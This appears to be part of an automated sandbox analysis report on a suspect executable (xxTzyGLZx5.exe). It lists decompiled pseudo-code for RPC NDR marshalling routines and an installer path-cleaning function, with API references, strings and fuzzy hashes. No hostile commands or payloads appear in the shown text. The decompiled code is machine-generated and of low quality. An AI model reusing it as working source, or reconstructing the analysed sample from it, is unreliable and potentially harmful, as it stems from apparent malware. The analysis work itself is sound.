                                                                                                				if(( *(_t134 + 0x20) & 0x000000ff) != 0) {
                                                                                                					if(( *(_t134 + 0x18) & 0x000000ff) == 0) {
                                                                                                						if(( *(_t134 + 0x1c) & 0x000000ff) == 0 || ( *( *((intOrPtr*)(_t134 + 0xc)) + 0x20) & 0x000000ff) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x10)))) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 0x3c)) !=  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 0x44))) {
                                                                                                							if( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x10)))) == 0) {
                                                                                                								_t84 =  *((intOrPtr*)(_t134 + 0xc));
                                                                                                								__imp__NdrAllocate(_t84,  *((intOrPtr*)(_t134 - 0x14)));
                                                                                                								 *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x10)))) = _t84;
                                                                                                							}
                                                                                                						} else {
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x10)))) =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 4));
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t88 =  *((intOrPtr*)(_t134 - 0x14));
                                                                                                						__imp__NdrAllocate( *((intOrPtr*)(_t134 + 0xc)), _t88);
                                                                                                						 *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x10)))) = _t88;
                                                                                                					}
                                                                                                					if( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x10)))) !=  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 4))) {
                                                                                                						E6EDAAFA0( *((intOrPtr*)(_t134 + 0xc)),  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x10)))),  *((intOrPtr*)(_t134 - 0xc)));
                                                                                                					} else {
                                                                                                						E6EDAAF00( *((intOrPtr*)(_t134 + 0xc)),  *((intOrPtr*)(_t134 - 0xc)));
                                                                                                					}
                                                                                                					_t80 =  *( *(_t134 + 0x14)) & 0x000000ff;
                                                                                                					if(_t80 != 0x22) {
                                                                                                						_t81 =  *((intOrPtr*)(_t134 + 0x10));
                                                                                                						0x6eda0000( *_t81);
                                                                                                						0x6eda0000("string=%s\n", _t81);
                                                                                                					} else {
                                                                                                						0x6eda0000( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x10)))));
                                                                                                						0x6eda0000("string=%s\n", _t80);
                                                                                                					}
                                                                                                				}
                                                                                                				_t75 =  *((intOrPtr*)(_t134 - 0xc));
                                                                                                				return _t75;
                                                                                                			}












                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDADB47
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDADB6F
                                                                                                • NdrAllocate.RPCRT4(?,?), ref: 6EDADBD4
                                                                                                • NdrAllocate.RPCRT4(?,?), ref: 6EDADC27
                                                                                                Strings
                                                                                                • string=%s, xrefs: 6EDADC81
                                                                                                • buffer size %d must equal memory size %ld for non-sized conformant strings, xrefs: 6EDADB35
                                                                                                • conformant strings can't have Offset (%d), xrefs: 6EDADB5D
                                                                                                • string=%s, xrefs: 6EDADC9F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: AllocateExceptionRaise
                                                                                                • String ID: buffer size %d must equal memory size %ld for non-sized conformant strings$conformant strings can't have Offset (%d)$string=%s$string=%s
                                                                                                • API String ID: 1227477006-815763081
                                                                                                • Opcode ID: 4ffbe9906987fbec421162cc015659ffa4862a1b22de8259e3242eae7c7c9c8d
                                                                                                • Instruction ID: 18993c18bd17548e071d78ab53569980be1b478b3b16cac010148407fb7387d1
                                                                                                • Opcode Fuzzy Hash: 4ffbe9906987fbec421162cc015659ffa4862a1b22de8259e3242eae7c7c9c8d
                                                                                                • Instruction Fuzzy Hash: D5512BB5A00109EFCB44DF98C890EAAB776AF89318F10C558FE558B385E735EA41CF61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 19%
                                                                                                			E6EDA1160(intOrPtr _a4, intOrPtr _a8, signed char* _a12) {
                                                                                                				signed char* _v8;
                                                                                                				signed char* _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				signed int _v20;
                                                                                                				intOrPtr _t72;
                                                                                                				signed char* _t73;
                                                                                                				signed char* _t98;
                                                                                                				void* _t126;
                                                                                                				void* _t127;
                                                                                                				void* _t132;
                                                                                                
                                                                                                				_v8 = _a12;
                                                                                                				0x6eda0000("(%p, %p, %p)\n", _a4, _a8, _a12);
                                                                                                				_t127 = _t126 + 0x10;
                                                                                                				_a12 = _a12 + 6;
                                                                                                				if(( *_v8 & 0x000000ff) == 0x18 || ( *_v8 & 0x000000ff) == 0x17) {
                                                                                                					_v12 =  &(_v8[_v8[4] + 4]);
                                                                                                					__eflags = ( *_v12 & 0x000000ff) - 0x1b;
                                                                                                					if(__eflags == 0) {
                                                                                                						_v20 = _v12[2] & 0x0000ffff;
                                                                                                						0x6eda0000(_a4, (_v8[2] & 0x0000ffff) + _a8,  &(_v12[4]), 0);
                                                                                                						E6EDAA730(_a4, __eflags, _a4);
                                                                                                						E6EDA7400(_a4 + 4, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
                                                                                                						0x6eda0000("memory_size = %d\n", _v8[2] & 0x0000ffff);
                                                                                                						_t72 = E6EDAAEC0(_v20,  *((intOrPtr*)(_a4 + 0x3c)));
                                                                                                						_t132 = _t127 + 0x2c;
                                                                                                						_v16 = _t72;
                                                                                                						_t98 = _v8;
                                                                                                						_t73 = _v8;
                                                                                                						__eflags = ( *(_t98 + 2) & 0x0000ffff) + _v16 - ( *(_t73 + 2) & 0x0000ffff);
                                                                                                						if(( *(_t98 + 2) & 0x0000ffff) + _v16 < ( *(_t73 + 2) & 0x0000ffff)) {
                                                                                                							0x6eda0000("integer overflow of memory_size %u with bufsize %u\n", _v8[2] & 0x0000ffff, _v16);
                                                                                                							_t132 = _t132 + 0xc;
                                                                                                							__imp__RpcRaiseException(0x6f7);
                                                                                                						}
                                                                                                						 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
                                                                                                						E6EDAB030(_a4, _a8, (_v8[2] & 0x0000ffff) + _v16);
                                                                                                						__eflags = ( *_v8 & 0x000000ff) - 0x18;
                                                                                                						if(( *_v8 & 0x000000ff) == 0x18) {
                                                                                                							E6EDABFC0(_a4, _a8, _a12);
                                                                                                						}
                                                                                                						__eflags = 0;
                                                                                                						return 0;
                                                                                                					}
                                                                                                					0x6eda0000("invalid array format type %x\n",  *_v8 & 0x000000ff);
                                                                                                					__imp__RpcRaiseException(0x6e6);
                                                                                                					return 0;
                                                                                                				} else {
                                                                                                					0x6eda0000("invalid format type %x\n",  *_v8 & 0x000000ff);
                                                                                                					__imp__RpcRaiseException(0x6e6);
                                                                                                					return 0;
                                                                                                				}
                                                                                                			}














                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA11BD
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA11FF
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA12BA
                                                                                                Strings
                                                                                                • invalid array format type %x, xrefs: 6EDA11ED
                                                                                                • invalid format type %x, xrefs: 6EDA11AB
                                                                                                • (%p, %p, %p), xrefs: 6EDA1178
                                                                                                • memory_size = %d, xrefs: 6EDA1264
                                                                                                • integer overflow of memory_size %u with bufsize %u, xrefs: 6EDA12A8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$integer overflow of memory_size %u with bufsize %u$invalid array format type %x$invalid format type %x$memory_size = %d
                                                                                                • API String ID: 3997070919-1411272697
                                                                                                • Opcode ID: 0e401a1702892e43752af72516a1aef7b2b0fe89c3c34720432832682deb36cb
                                                                                                • Instruction ID: 4261c264eb63bc5963f8fe56a43a86e2c675ed5400996bde466ef5ac2a0b5c9d
                                                                                                • Opcode Fuzzy Hash: 0e401a1702892e43752af72516a1aef7b2b0fe89c3c34720432832682deb36cb
                                                                                                • Instruction Fuzzy Hash: 79515FB5A00108EBCB44CFD8D8919BEB7F6AF89249F148588F9499B345E731DF51CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDA435B
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA43A2
                                                                                                • NdrAllocate.RPCRT4(?,?), ref: 6EDA4400
                                                                                                Strings
                                                                                                • (pStubMsg == ^%p, *pMemory == ^%p, pFormat == ^%p, fMustAlloc == %u), xrefs: 6EDA4309
                                                                                                • Unhandled string type: %#x, xrefs: 6EDA4390
                                                                                                • string=%s, xrefs: 6EDA4442
                                                                                                • non-conformant strings can't have Offset (%d), xrefs: 6EDA4349
                                                                                                • string=%s, xrefs: 6EDA4472
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise$Allocate
                                                                                                • String ID: (pStubMsg == ^%p, *pMemory == ^%p, pFormat == ^%p, fMustAlloc == %u)$Unhandled string type: %#x$non-conformant strings can't have Offset (%d)$string=%s$string=%s
                                                                                                • API String ID: 3870461605-2310601589
                                                                                                • Opcode ID: ea3a63433583cc231137013f4af7b4b76325aede29c48862343a419cc2fc7f59
                                                                                                • Instruction ID: f5a6b3f7696ce4a16c4be2bbac898541068d517fc49ddaf7e29cbe3435b423fa
                                                                                                • Opcode Fuzzy Hash: ea3a63433583cc231137013f4af7b4b76325aede29c48862343a419cc2fc7f59
                                                                                                • Instruction Fuzzy Hash: C1518FB5A00104EFCB04CFD8D890AAE77BAAF89305F108558FE558B345E731EA51CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F4,?,?,?,?,?,?,?,?,?,?,?,?,6EDA8C95), ref: 6EDABAAD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p,%p,%p)$NULL ref pointer is not allowed$deref => %p$no buffersizer for data type=%02x$type=0x%x, attr=$unhandled ptr type=%02x
                                                                                                • API String ID: 3997070919-3973141097
                                                                                                • Opcode ID: 22076b8f2c9d1c0e61d7c02d782b92b07d0f4c36032e20ee92df49fa2f5df7d2
                                                                                                • Instruction ID: 94d65ee2384f4c30603fc03728b6ec8afbdb126d36c6bd1edf60be4fb322a511
                                                                                                • Opcode Fuzzy Hash: 22076b8f2c9d1c0e61d7c02d782b92b07d0f4c36032e20ee92df49fa2f5df7d2
                                                                                                • Instruction Fuzzy Hash: 305157B490420DEFDB04CFD8C894AAEBBB5FB49345F008459EA155B388E7709B51CBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 16%
                                                                                                			E6EDA8850(intOrPtr* _a4, intOrPtr* _a8, signed char* _a12, signed char _a16) {
                                                                                                				intOrPtr* _v8;
                                                                                                				char* _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				signed char* _t49;
                                                                                                				signed char* _t75;
                                                                                                				void* _t86;
                                                                                                				void* _t87;
                                                                                                
                                                                                                				if((_a16 & 0x000000ff) == 0) {
                                                                                                					_v12 = "FALSE";
                                                                                                				} else {
                                                                                                					_v12 = "TRUE";
                                                                                                				}
                                                                                                				0x6eda0000("pStubMsg %p, ppMemory %p, pFormat %p, fMustAlloc %s\n", _a4, _a8, _a12, _v12);
                                                                                                				_t87 = _t86 + 0x14;
                                                                                                				if(( *_a12 & 0x000000ff) != 0x30) {
                                                                                                					0x6eda0000("invalid format type %x\n",  *_a12 & 0x000000ff);
                                                                                                					_t87 = _t87 + 8;
                                                                                                					__imp__RpcRaiseException(0x6e6);
                                                                                                				}
                                                                                                				0x6eda0000("flags: 0x%02x\n", _a12[1] & 0x000000ff);
                                                                                                				if(( *(_a4 + 0x20) & 0x000000ff) == 0) {
                                                                                                					_v16 = E6EDA4BC0(__eflags, _a4, _a12);
                                                                                                					_t75 = _a12;
                                                                                                					__eflags =  *(_t75 + (1 << 0)) & 0x80;
                                                                                                					if(( *(_t75 + (1 << 0)) & 0x80) == 0) {
                                                                                                						 *_a8 =  *((intOrPtr*)(_v16 + 8));
                                                                                                					} else {
                                                                                                						 *_a8 = _v16 + 8;
                                                                                                					}
                                                                                                				} else {
                                                                                                					if((_a12[1] & 0x80) == 0) {
                                                                                                						_v8 = _a8;
                                                                                                					} else {
                                                                                                						_v8 =  *_a8;
                                                                                                					}
                                                                                                					_t49 = _a12;
                                                                                                					_t93 = (_t49[1] & 0x60) - 0x20;
                                                                                                					if((_t49[1] & 0x60) == 0x20) {
                                                                                                						 *_v8 = 0;
                                                                                                					}
                                                                                                					E6EDA49D0(_t93, _a4, _v8,  *((intOrPtr*)( *_a4)));
                                                                                                				}
                                                                                                				return 0;
                                                                                                			}

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA88AF
                                                                                                • _NdrClientContextUnmarshall@12.SOZZ(?,?,00000001), ref: 6EDA8934
                                                                                                • _NdrServerContextNewUnmarshall@8.SOZZ(?,?), ref: 6EDA8943
                                                                                                  • Part of subcall function 6EDA4BC0: RpcRaiseException.RPCRT4(000006F7), ref: 6EDA4C3D
                                                                                                  • Part of subcall function 6EDA4BC0: NDRSContextUnmarshall2.RPCRT4(00000000,00000000,?,?,00000000), ref: 6EDA4CCB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: Context$ExceptionRaise$ClientServerUnmarshall2Unmarshall@12Unmarshall@8
                                                                                                • String ID: FALSE$TRUE$flags: 0x%02x$invalid format type %x$pStubMsg %p, ppMemory %p, pFormat %p, fMustAlloc %s
                                                                                                • API String ID: 1280706169-3585304320
                                                                                                • Opcode ID: 513ac7c815d6957191f48849e557111c755e800d1b6b87529b7083037f0ef6ff
                                                                                                • Instruction ID: fb3e725e6dc90c7289dcbfb80729a61aa94eacf0a4f7a23c18f3b9a15010753a
                                                                                                • Opcode Fuzzy Hash: 513ac7c815d6957191f48849e557111c755e800d1b6b87529b7083037f0ef6ff
                                                                                                • Instruction Fuzzy Hash: 834182B5A002859FDB54CF99C8A0BAE7BB5FF89340F108059FD558F380C634DA11CB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA1B2C
                                                                                                • _NdrComplexArrayBufferSize@12.SOZZ(?,?,?), ref: 6EDA1B9D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ArrayBufferComplexExceptionRaiseSize@12
                                                                                                • String ID: (%p,%p,%p)$buffer overflow %d bytes$buffer=%d/%d$difference = 0x%x$invalid format type %x
                                                                                                • API String ID: 1767167962-3633984987
                                                                                                • Opcode ID: d85c9e1976170a2013127544c6ab2df09ff0a2fd7646de493ce39c9443eaf547
                                                                                                • Instruction ID: 934032a19e2b75e5dca8cac1b1a98b303fcd3cfb10ad86e234c903c508ec249e
                                                                                                • Opcode Fuzzy Hash: d85c9e1976170a2013127544c6ab2df09ff0a2fd7646de493ce39c9443eaf547
                                                                                                • Instruction Fuzzy Hash: 6971B9B8A00209EFCB04CF98C594EAABBB5FF88354F15C158ED498B355D731EA81CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • NdrAllocate.RPCRT4(?,00000004), ref: 6EDA2F98
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA2FDC
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDA302B
                                                                                                Strings
                                                                                                • *ppMemory: %p, xrefs: 6EDA303E
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, xrefs: 6EDA2FCA
                                                                                                • value exceeded bounds: %d, low: %d, high: %d, xrefs: 6EDA3019
                                                                                                • value: 0x%08x, xrefs: 6EDA3079
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise$Allocate
                                                                                                • String ID: *ppMemory: %p$buffer overflow - Buffer = %p, BufferEnd = %p$value exceeded bounds: %d, low: %d, high: %d$value: 0x%08x
                                                                                                • API String ID: 3870461605-453365574
                                                                                                • Opcode ID: e94560bb54eba049db4b24aa62ab58fe9e07393ffc42893acd994353a5f618cf
                                                                                                • Instruction ID: d05b07a60a0ccfd0b413dd9b569dccb26b7dcf7b12e43fd058628e364e9596ba
                                                                                                • Opcode Fuzzy Hash: e94560bb54eba049db4b24aa62ab58fe9e07393ffc42893acd994353a5f618cf
                                                                                                • Instruction Fuzzy Hash: 5841F8B8600105EFDB04CF99C495E9ABBB6EF8A358F14C188ED498F345D731EA51CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • NdrAllocate.RPCRT4(?,00000004), ref: 6EDA30BE
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA3102
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDA3151
                                                                                                Strings
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, xrefs: 6EDA30F0
                                                                                                • value: 0x%08x, xrefs: 6EDA319F
                                                                                                • value exceeded bounds: %u, low: %u, high: %u, xrefs: 6EDA313F
                                                                                                • *ppMemory: %p, xrefs: 6EDA3164
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise$Allocate
                                                                                                • String ID: *ppMemory: %p$buffer overflow - Buffer = %p, BufferEnd = %p$value exceeded bounds: %u, low: %u, high: %u$value: 0x%08x
                                                                                                • API String ID: 3870461605-3476790181
                                                                                                • Opcode ID: f5a26acbb3b2881b506125a34ad4de88cc7a88c57d9a5df3b941b68c06d26f25
                                                                                                • Instruction ID: e923f47aeea0ca164f4db6df82fc2d1bd0771d33475f03a2390ca94fea5ca08b
                                                                                                • Opcode Fuzzy Hash: f5a26acbb3b2881b506125a34ad4de88cc7a88c57d9a5df3b941b68c06d26f25
                                                                                                • Instruction Fuzzy Hash: 0E4109B8600105EFD704CF98C894E5ABBA6EF89354F14C188EA498F385D731EA81CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • NdrAllocate.RPCRT4(?,00000004), ref: 6EDA31E4
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA3228
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDA327A
                                                                                                Strings
                                                                                                • value exceeded bounds: %u, low: %u, high: %u, xrefs: 6EDA3268
                                                                                                • *ppMemory: %p, xrefs: 6EDA328A
                                                                                                • value: 0x%08x, xrefs: 6EDA32C6
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, xrefs: 6EDA3216
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise$Allocate
                                                                                                • String ID: *ppMemory: %p$buffer overflow - Buffer = %p, BufferEnd = %p$value exceeded bounds: %u, low: %u, high: %u$value: 0x%08x
                                                                                                • API String ID: 3870461605-3476790181
                                                                                                • Opcode ID: 2e0555c7184e9dd28b003d2a778352b396cad46f388f873bbb442856692e6845
                                                                                                • Instruction ID: b050c8c134f06b090baa625cbe31acd8a454ec7db6c5c869c630b029c6956966
                                                                                                • Opcode Fuzzy Hash: 2e0555c7184e9dd28b003d2a778352b396cad46f388f873bbb442856692e6845
                                                                                                • Instruction Fuzzy Hash: E64118B8600104EFD704CF98C895E6ABBA6FF89354F14C188ED498F395D331EA91CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00405B89(CHAR* _a4) {
                                                                                                				char _t5;
                                                                                                				char _t7;
                                                                                                				char* _t15;
                                                                                                				char* _t16;
                                                                                                				CHAR* _t17;
                                                                                                
                                                                                                				_t17 = _a4;
                                                                                                				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                                                                					_t17 =  &(_t17[4]);
                                                                                                				}
                                                                                                				if( *_t17 != 0 && E0040548B(_t17) != 0) {
                                                                                                					_t17 =  &(_t17[2]);
                                                                                                				}
                                                                                                				_t5 =  *_t17;
                                                                                                				_t15 = _t17;
                                                                                                				_t16 = _t17;
                                                                                                				if(_t5 != 0) {
                                                                                                					do {
                                                                                                						if(_t5 > 0x1f &&  *((char*)(E00405449("*?|<>/\":", _t5))) == 0) {
                                                                                                							E004055C3(_t16, _t17, CharNextA(_t17) - _t17);
                                                                                                							_t16 = CharNextA(_t16);
                                                                                                						}
                                                                                                						_t17 = CharNextA(_t17);
                                                                                                						_t5 =  *_t17;
                                                                                                					} while (_t5 != 0);
                                                                                                				}
                                                                                                				 *_t16 =  *_t16 & 0x00000000;
                                                                                                				while(1) {
                                                                                                					_t16 = CharPrevA(_t15, _t16);
                                                                                                					_t7 =  *_t16;
                                                                                                					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                                						break;
                                                                                                					}
                                                                                                					 *_t16 =  *_t16 & 0x00000000;
                                                                                                					if(_t15 < _t16) {
                                                                                                						continue;
                                                                                                					}
                                                                                                					break;
                                                                                                				}
                                                                                                				return _t7;
                                                                                                			}









                                                                                                APIs
                                                                                                • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                                                                                                • CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                                                                                                • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                                                                                                • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: Char$Next$Prev
                                                                                                • String ID: "C:\Users\user\Desktop\xxTzyGLZx5.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 589700163-1747928552
                                                                                                • Opcode ID: e0832ec2d912e5d74df0801281a3a7736ede427d3fd94c72d6daa08f5325fd7a
                                                                                                • Instruction ID: c1e19bc38f5928a16c8df4e3184f884ce5b3d56ade5c4132b49213cb44a1c68a
                                                                                                • Opcode Fuzzy Hash: e0832ec2d912e5d74df0801281a3a7736ede427d3fd94c72d6daa08f5325fd7a
